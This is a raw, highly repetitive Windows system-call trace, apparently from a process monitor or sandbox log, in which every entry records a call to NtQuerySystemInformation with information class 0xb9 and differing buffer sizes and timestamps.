NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0229.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.928] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0f0, Length=0x28, ResultLength=0x0) [0229.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0229.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x20, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x38, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf50, Length=0x20, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x28, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.960] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x28, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce90, Length=0x20, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x20, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x58, ResultLength=0x0) [0229.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x38, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x28, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.968] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 